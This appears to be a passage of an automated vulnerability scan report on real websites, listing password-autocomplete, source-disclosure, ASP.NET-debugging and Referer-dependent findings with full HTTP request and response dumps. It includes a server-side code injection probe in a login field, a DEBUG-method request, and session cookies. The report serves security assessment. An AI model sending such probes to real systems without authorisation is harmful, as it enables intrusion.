GET / HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:04 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 12904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<script type="
...[SNIP]...
<div id="quick_login">
<form method="POST" name="login" id="quick_login_form" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
<input type="hidden" name="act" value="login" />
...[SNIP]...
<div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="quick_pass" /></div>
...[SNIP]...

17.295. http://www.livejournal.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws24
ETag: "2973888db3f7f93cbba310f7bf86432d"
Vary: Accept-Encoding
Content-Language: en
X-Debug: USen gzip (null)
X-VWS-Id: bil1-varn03
X-Varnish: 307153447 307107722
Age: 292
Via: 1.1 varnish
Content-Length: 50232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<div class="lj_loginform" id="Login">
<form style='margin: 0; padding: 0;' method="post" action="https://www.livejournal.com/login.bml?ret=1" id="login" class="lj_login_form">

<input type='hidden' name='mode' value='login' />
...[SNIP]...
<td style='white-space: nowrap;'><input type="password" name="password" size="15" class="lj_login_password" tabindex="2" />
<input type='submit' value="Log in" tabindex='3' />
...[SNIP]...

17.296. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="menu_body" style="margin-bottom:5px">
<form id="mg-auth-form-1" action="http://usr.marketgid.com/creative/auth/" method="post">
<div>
...[SNIP]...
</div>
<input id="pass" type="password" name="pass" value=".........." size="25" tabindex="2" onfocus="form_change(this)" onblur="form_change(this)" /><input class="submit-button" type="submit" value="........" tabindex="3" />
...[SNIP]...

18. Source code disclosure  previous  next
There are 3 instances of this issue:


18.1. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 66

j_password=3&j_username=%3c%25+response.write(268409241-22)+%25%3e

Response

HTTP/1.1 100 Continue

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:04 GMT;path=/
Content-Language: en-
...[SNIP]...
<input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="<% response.write(268409241-22) %>" onKeyPress="checkEnter();">
...[SNIP]...

18.2. http://l-files.livejournal.net/userapps/10/image  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://l-files.livejournal.net
Path:   /userapps/10/image

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /userapps/10/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1354355956 1354352273
Via: 1.1 varnish
Age: 251968
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Thu, 03 Feb 2011 11:13:43 GMT
Content-Length: 37341
Connection: keep-alive

......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS5 Macintosh.2011:02:03 11:49:08.........................
...[SNIP]...
.&...vF]2w..Y%...M..;.*K....G..._....=...x._..'..8BIM.!.....U..........A.d.o.b.e. .P.h.o.t.o.s.h.o.p.....A.d.o.b.e. .P.h.o.t.o.s.h.o.p. .C.S.5.....8BIM...................bhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
<?xpacket end="w"?>...XICC_PROFILE......HLino....mntrRGB XYZ .....    ...1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXY
...[SNIP]...

18.3. http://www.netsuite.com/portal/javascript/NLPortal.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.netsuite.com
Path:   /portal/javascript/NLPortal.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /portal/javascript/NLPortal.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1303736347554-914602#1303743997|PC#1303736347554-914602.17#1304951737|check#true#1303742197; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 50687
Content-Disposition: inline;filename="NLPortal.js"
NS_RTIMER_COMPOSITE: 1229137097:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/octet-stream; charset=utf-8
Cache-Control: max-age=2534
Date: Mon, 25 Apr 2011 14:40:40 GMT
Connection: close

function getBaseDomain()
{
var domain = document.domain;
var ifirst= domain.indexOf(".");
domain=domain.substring(ifirst+1);        
return domain;
}

// for netcrm the appdomain is netsuite
...[SNIP]...
&& partner.length > -1)
{
var vCookieVals = partner.split(",");
partner = vCookieVals[1];
//document.cookie = "visitorCookie; path=/portal/; domain="www.<%=NLConfig.getSystemDomain()%>"; expires=Fri, 02-Jan-1970 00:00:00";
// setCookie("visitorCookie", null, null, , "www.<%=NLConfig.getSystemDomain()%>", secure)
if(partner != null && partner != "")
setCookie("partner", partner, "/", null, getBaseDomain(), null)
}
}

//return null if no partner code exi
...[SNIP]...

19. ASP.NET debugging enabled  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ideco-software.ru
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: ideco-software.ru
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 25 Apr 2011 14:36:05 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 39

Debug access denied to '/Default.aspx'.

20. Referer-dependent response  previous  next
There are 8 instances of this issue:


20.1. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Request 1

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303696672_1660:517000; uid=1_1303696672_1303179323923:6792170478871670; kwd=1_1303696672; sit=1_1303696672_2451:5100:0_3236:163063:162945_782:517349:517000; cre=1_1303696672; bpd=1_1303696672; apd=1_1303696672; scg=1_1303696672; ppd=1_1303696672; afl=1_1303696672

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:57 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1303744437_10164:0_10638:0_10640:0_10641:0_1437:0_1660:564765; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: uid=1_1303744437_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: kwd=1_1303744437_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: sit=1_1303744437_719:0:0_2451:52865:47765_3236:210828:210710_782:565114:564765; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: cre=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: bpd=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: apd=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: scg=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: ppd=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: afl=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 15:13:58 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
<![endif]>

<!-- matched campaign #10164 is eligible -->
<!-- matched campaign #10638 is eligible -->
<!-- matched campaign #10640 is eligible -->
<!-- matched campaign #10641 is eligible -->
<img width=1 height=1 border=0 src="http://ad.trafficmp.com/a/bpix?adv=652&id=1005&r=">
<!-- "Net Suite" c/o "FetchBack", segment: 'Net Suite Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>
<!-- End of pixel tag -->
<!-- List Id = 34879 and List Name = CM_FB_169 -->
<!-- Begin ad tag -->
<script language= "JavaScript" type="text/javascript">
ord=Math.random()*10000000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord='+ ord +'?"width="1" height="1" border="0" alt="">');
</script>
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
<!-- End ad tag -->
<img src="http://pixel.rubiconproject.com/tap.php?v=2939|1" border="0" width="1" height="1">
<!-- "NetSuite AU" c/o "FetchBack", segment: 'NetSuiteAU Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag -->
<!-- "NetSuite Singapore" c/o "FetchBack", segment: 'NetSuite Sing Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment" width="1" height="1" />
</noscript
...[SNIP]...

Request 2

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303696672_1660:517000; uid=1_1303696672_1303179323923:6792170478871670; kwd=1_1303696672; sit=1_1303696672_2451:5100:0_3236:163063:162945_782:517349:517000; cre=1_1303696672; bpd=1_1303696672; apd=1_1303696672; scg=1_1303696672; ppd=1_1303696672; afl=1_1303696672

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303744445_1437:0_1660:564773; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: uid=1_1303744445_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: kwd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: sit=1_1303744445_719:0:0_2451:52873:47773_3236:210836:210718_782:565122:564773; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: cre=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: bpd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: apd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: scg=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: ppd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: afl=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 15:14:05 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2488

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
<![endif]>

<img width=1 height=1 border=0 src="http://ad.trafficmp.com/a/bpix?adv=652&id=1005&r=">
<!-- "Net Suite" c/o "FetchBack", segment: 'Net Suite Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>
<!-- End of pixel tag -->
<!-- List Id = 34879 and List Name = CM_FB_169 -->
<!-- Begin ad tag -->
<script language= "JavaScript" type="text/javascript">
ord=Math.random()*10000000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord='+ ord +'?"width="1" height="1" border="0" alt="">');
</script>
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
<!-- End ad tag -->
<img src="http://pixel.rubiconproject.com/tap.php?v=2939|1" border="0" width="1" height="1">
<!-- Advertiser 'FetchBack (m)', Include user in segment 'retargeting - 242' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.bannerconnect.net/pixel?id=495608&t=2" width="1" height="1" />
<!-- End of segment tag -->
<img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1" width="1" height="1" border="0" >
<img src="http://ad.adtegrity.net/pixel?id=494024&t=2" width="1" height="1" />
<!-- Advertiser 'OpenX Limited', Include user in segment 'Fetchback_148' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldmanager.com/pixel?id=478454&t=2" width="1" height="1" />
<!-- End of segment tag -->
<!-- List Id = 23534 and List Name = Net Suite Retargeting -->
<!-- Begin ad tag -->
<script language= "JavaScript" type="text/javascript">
ord=Math.random()*10000000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=1801246;dcnet=4591;boom=23534;sz=1x1;ord='+ ord +'?"width="1" height="1" border="0" alt="">');
</script>
<noscript>
<img src
...[SNIP]...

20.2. http://solutions.kronos.com/content/experience2011  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://solutions.kronos.com
Path:   /content/experience2011

Request 1

GET /content/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:36 GMT
Content-Length: 15646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
<img src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=07f4199a-e2e3-4df4-8cd3-81c0c6bfdbf6&elq={00000000-0000-0000-0000-000000000000}&ref=http%3a%2f%2fwww.kronos.com%2f&elq_ck=0" border=0 width=1 height=1 ><\/layer>');
}else{
document.write('<img style="display:none" src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=07f4199a-e2e3-4df4-8cd3-81c0c6bfdbf6&elq={00000000-0000-0000-0000-000000000000}&ref=http%3a%2f%2fwww.kronos.com%2f&elq_ck=0" border=0 width=1 height=1 >');
}
-->
</script>

Request 2

GET /content/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:55:26 GMT
Content-Length: 15576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
<img src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=5c7c78e8-9c2a-422e-971f-b2e7b77b3a37&elq={00000000-0000-0000-0000-000000000000}&elq_ck=0" border=0 width=1 height=1 ><\/layer>');
}else{
document.write('<img style="display:none" src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=5c7c78e8-9c2a-422e-971f-b2e7b77b3a37&elq={00000000-0000-0000-0000-000000000000}&elq_ck=0" border=0 width=1 height=1 >');
}
-->
</script>

20.3. http://www.eset.com/us/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/

Request 1

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.1.10.1303743158; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_visit%3D1%7C1303744959492%3B%20gpv_pageName%3Dus/new_homepage%7C1303744959494%3B%20s_nr%3D1303743159496-Repeat%7C1335279159496%3B%20s_invisit%3Dtrue%7C1303744959497%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 25-Apr-2010 15:16:46 GMT
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:16:47 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26704
Date: Mon, 25 Apr 2011 15:16:47 GMT
X-Varnish: 555652739
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ng name, server, and channel on
the next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
